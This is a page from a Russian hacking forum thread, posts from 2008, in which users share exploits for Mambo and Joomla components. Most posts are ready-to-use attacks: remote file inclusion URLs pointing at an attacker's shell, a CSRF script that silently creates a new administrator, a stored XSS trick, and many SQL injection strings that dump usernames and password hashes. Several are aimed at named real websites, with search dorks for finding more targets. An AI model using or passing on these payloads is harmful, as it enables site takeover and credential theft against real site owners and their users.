ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #21  
Старый 11.01.2008, 23:28
Аватар для Proxyr
Proxyr
Новичок
Регистрация: 09.01.2008
Сообщений: 2
Провел на форуме:
35941

Репутация: 2
По умолчанию

com_serverstat (компонент Mambo & Joomla)
/Этот компонент используеться для отображения статистики игровых серверов/

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "mosConfig_absolute_path" в сценарии шаблона administrator/components/com_serverstat/templates/template.game.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Переменная переданная через GET запрос используеться include. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP.
Пример:
Код:
http://[host]/administrator/components/com_serverstat/templates/template.game.php?mosConfig_absolute_path=[http://file]
...........................................
а также:
в параметре "mosConfig_absolute_path" в сценарии administrator/components/com_serverstat/install.serverstat.php
Пример:
Код:
http://[host]/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=[http://file]

Последний раз редактировалось Proxyr; 11.01.2008 в 23:57..
 
Ответить с цитированием

  #22  
Старый 11.01.2008, 23:44
Аватар для _kREveDKo_
_kREveDKo_
Banned
Регистрация: 04.12.2005
Сообщений: 826
Провел на форуме:
5223479

Репутация: 3813


По умолчанию

com_serverstat (компонент Mambo & Joomla)
Ну тогда ещё упомянем, что там есть и активная XSS - В поле ника игрока. Если не хватит символов для полноценной атаки (не помню сколько в ник влазит), то можно закончить ник вот так:
Код HTML:
<!--
, потом войти ещё одним игроком в игру с ником начинающимся на
Код HTML:
-->
ну и так далее, до тех пор пока не хватит места...
 
Ответить с цитированием

Joomla 1.0.13 CSRF Vulnerability
  #23  
Старый 13.01.2008, 21:12
Аватар для +toxa+
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию Joomla 1.0.13 CSRF Vulnerability

Цитата:
Severity
========
Mild. It requires an administrator to be logged in and to be tricked into a specially
crafted webpage.
PHP код:
<script type="text/javascript">
window.onload = function() {
var 
url "http://joomlasite.com/joomla/administrator/index2.php";
var 
gid 25;
var 
user 'custom_username';
var 
pass 'custom_password';
var 
email 'joe_cool (at) example (dot) com [email concealed]';
var 
param = {
nameuser,
usernameuser,
emailemail,
passwordpass,
password2pass,
gidgid,
block0,
option'com_users',
task'save',
sendEmail1
};
var 
form document.createElement('form');
form.action url;
form.method 'post';
form.target 'hidden';
form.style.display 'none';
for (var 
i in param) {
try {
// ie
var input document.createElement('<input name="'+i+'">');
} catch(
e) {
// other browsers
var input document.createElement('input');
input.name i;
}
input.setAttribute('value'param[i]);
form.appendChild(input);
}
document.body.appendChild(form);
form.submit();
}
</
script>
<
iframe name="hidden" style="display: none"></iframe>
<
img src="http://www.more4kids.info/uploads/Image/Carebears-Cover.jpg"
PS добавляет нового админа с заданным логином, пассом и мылом, если кто не понял...
__________________
 
Ответить с цитированием

JoomlaFlash Component Multiple Remote File Inclusion
  #24  
Старый 22.01.2008, 03:33
Аватар для iddqd
iddqd
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567

Репутация: 2145


По умолчанию JoomlaFlash Component Multiple Remote File Inclusion

Flash Component Multiple Remote File Inclusion

Vulnerable: 2.5.1, 2.5.2

Exploit:

Код:
http://sito.it/administrator/components/com_joomla_flash_uploader/install.joomla_
flash_uploader.php?mosConfig_absolute_path=shell? 

http://sito.it/administrator/components/com_joomla_flash_uploader/uninstall.jooml
a_flash_uploader.php?mosConfig_absolute_path=shell?
 
Ответить с цитированием

  #25  
Старый 23.01.2008, 17:54
Аватар для ХаЬа
ХаЬа
Banned
Регистрация: 18.01.2008
Сообщений: 6
Провел на форуме:
29103

Репутация: 25
По умолчанию

Joomla Component NeoRecruit

SQL:
http://[сайт]/index.php?option=com_neorecruit&task=offer_view&id =[SQL инъекция]

Пример:
Код:
http://www.sepangaircraft.com/index.php?option=com_neorecruit&task=offer_view&id=36985

2+UNION+SELECT+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,

20,21,22,23,24,25+FROM+jos_users--
Joomla Component Nice Talk

SQL:
http://[сайт]/index.php?option=com_nicetalk&tagid=[SQL инъекция]

Пример:
Код:
http://www.diariometropolitano.com/rmbs/index.php?option=com_nicetalk&tagid=-1)+UNION+

SELECT+1,2,3,4,5,6,7,8,9,10,concat(username,0x3a,password),12,13,14,15,16,17,18+FROM+jos_use

rs--

Joomla перфикс jos_
Mamba перфикс mos_
 
Ответить с цитированием

Joomla Multiple Remote File Inclusion
  #26  
Старый 24.01.2008, 18:50
Аватар для iddqd
iddqd
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567

Репутация: 2145


По умолчанию Joomla Multiple Remote File Inclusion

Remote File Inclusion

Vulnerable: com_panoramic version 1.0

PoC:

Код:
http://localhost/path/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=[evilcode]
Remote File Inclusion

Vulnerable: MOSMediaLite451

PoC:

Код:
http://www.site.net/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=[shell] 
http://www.site.net/administrator/components/com_mosmedia/includes/info.html.php?mosConfig_absolute_path=[shell] 
http://www.site.net/administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=[shell] 
http://www.site.net/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=[shell] 
http://www.site.net/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=[shell] 
http://www.site.net/administrator/components/com_mosmedia/includes/support.html.php?mosConfig_absolute_path=[shell]

Последний раз редактировалось iddqd; 24.01.2008 в 19:00..
 
Ответить с цитированием

  #27  
Старый 30.01.2008, 18:57
Аватар для Solide Snake
Solide Snake
Moderator - Level 7
Регистрация: 28.04.2007
Сообщений: 547
Провел на форуме:
5516499

Репутация: 3702


Отправить сообщение для Solide Snake с помощью ICQ
По умолчанию

Mambo Component Newsletter (listid) Remote SQL Injection

SQL Injection:

Код:
index.php?option=com_newsletter&Itemid=S@BUN&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*
Для поиска вводим:

Код:
allinurl: "com_newsletter"

Mambo Component Fq (listid) Remote SQL Injection

SQL Injection:

Код:
index.php?option=com_fq&Itemid=S@BUN&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*
Для поиска вводим:

Код:
allinurl: "com_fq"

Mambo Component MaMML (listid) Remote SQL Injection

SQL Injection:

Код:
index.php?option=com_mamml&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*
Для поиска вводим:

Код:
allinurl: "com_mamml"

Mambo Component Glossary 2.0 (catid) SQL Injection

SQL Injection:

Код:
index.php?option=com_glossary&func=display&Itemid=s@bun&catid=-1%20union%20select%201,username,password,4,5,6,7,8,9,10,11,12,13,14%20from%20mos_users-
Для поиска вводим:

Код:
allinurl: "com_glossary"
(c)
 
Ответить с цитированием

  #28  
Старый 31.01.2008, 02:15
Аватар для Solide Snake
Solide Snake
Moderator - Level 7
Регистрация: 28.04.2007
Сообщений: 547
Провел на форуме:
5516499

Репутация: 3702


Отправить сообщение для Solide Snake с помощью ICQ
По умолчанию

Mambo Component musepoes (aid) Remote SQL Injection

SQL Injection:

Код:
index.php?option=com_musepoes&task=answer&Itemid=s@bun&catid=s@bun&aid=-1/**/union/**/select/**/0,username,password,0x3a,0x3a,3,0,0x3a,0,4,4,4,0,0x3a,0,5,5,5,0,0x3a/**/from/**/mos_users/*
Для поиска вводим:

Код:
allinurl: "com_musepoes"

Mambo Component buslicense (aid) Remote SQL Injection

SQL Injection:

Код:
index.php?option=com_buslicense&sectionid=9999&Itemid=9999&task=list&aid=-1/**/union/**/select/**/0,username,0x3a,password,4,5,6,7,8,9,10,11,12,13,14/**/from/**/mos_users/*
Для поиска вводим:

Код:
allinurl: "com_buslicense"

Mambo Component Recipes 1.00 (id) Remote SQL Injection

SQL Injection:

Код:
index.php?option=com_recipes&Itemid=S@BUN&func=detail&id=-1/**/union/**/select/**/0,1,concat(username,0x3a,password),username,0x3a,5,6,7,8,9,10,11,12,0x3a,0x3a,0x3a,username,username,0x3a,0x3a,0x3a,21,0x3a/**/from/**/mos_users/*
Для поиска вводим:

Код:
allinurl: "com_recipes"

Mambo Component jokes 1.0 (cat) SQL Injection

SQL Injection:

Код:
index.php?option=com_jokes&Itemid=S@BUN&func=CatView&cat=-776655/**/union/**/select/**/0,1,2,3,username,5,password,7,8/**/from/**/mos_users/*
Для поиска вводим:

Код:
allinurl: "com_jokes"

Mambo Component EstateAgent 0.1 Remote SQL Injection

SQL Injection:

Код:
index.php?option=com_estateagent&Itemid=S@BUN&func=showObject&info=contact&objid=-9999/**/union/**/select/**/username,password/**/from/**/mos_users/*&results=S@BUN
Для поиска вводим:

Код:
allinurl: "com_estateagent"
(c)
 
Ответить с цитированием

  #29  
Старый 01.02.2008, 10:07
Аватар для it's my
it's my
Banned
Регистрация: 29.09.2007
Сообщений: 512
Провел на форуме:
4038468

Репутация: 1224


Отправить сообщение для it's my с помощью ICQ
По умолчанию

Component Catalogshop 1.0b1 SQL Injection Vulnerability

inurl: index.php?option=com_catalogshop
Инъекция:
Код:
index.php?option=com_catalogshop&Itemid=99999999&func=detail&id=-1+union+select+1,2,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+mos_users--
http://www.uralmetall.com/index.php?option=com_catalogshop&Itemid=99999999&func=detail&id=-1+union+select+1,2,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13+from+mos_users--
Component AkoGallery 2.5b SQL Injection Vulnerability

inurl: index.php?option=com_akogallery
Инъекция:
Код:
index.php?option=com_akogallery&Itemid=99999999&func=detail&id=-1+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+mos_users--
http://brodnica.com.pl/powiat/index.php?option=com_akogallery&Itemid=99999999&func=detail&id=-1+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+mos_users--
(с) hackturkiye.com
 
Ответить с цитированием

  #30  
Старый 01.02.2008, 17:34
Аватар для Mr. P.S.
Mr. P.S.
Участник форума
Регистрация: 27.05.2007
Сообщений: 237
Провел на форуме:
2256445

Репутация: 767
По умолчанию

SQL-инъекция в Mambo Component Restaurant

Программа: Mambo Component Restaurant 1.0

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием index.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Пример:
Код:
index.php?option=com_restaurant&Itemid=S@BUN&func=detail&id=-1/* */union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,username/* */from/**/mos_users/*
(c)

Последний раз редактировалось Mr. P.S.; 01.02.2008 в 18:25..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей в форумных движках] Grey Форумы 48 28.12.2009 20:03
Обзор бесплатных Cms em00s7 PHP, PERL, MySQL, JavaScript 16 03.07.2009 13:13
Cms Cawabunga PHP, PERL, MySQL, JavaScript 20 05.08.2007 00:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ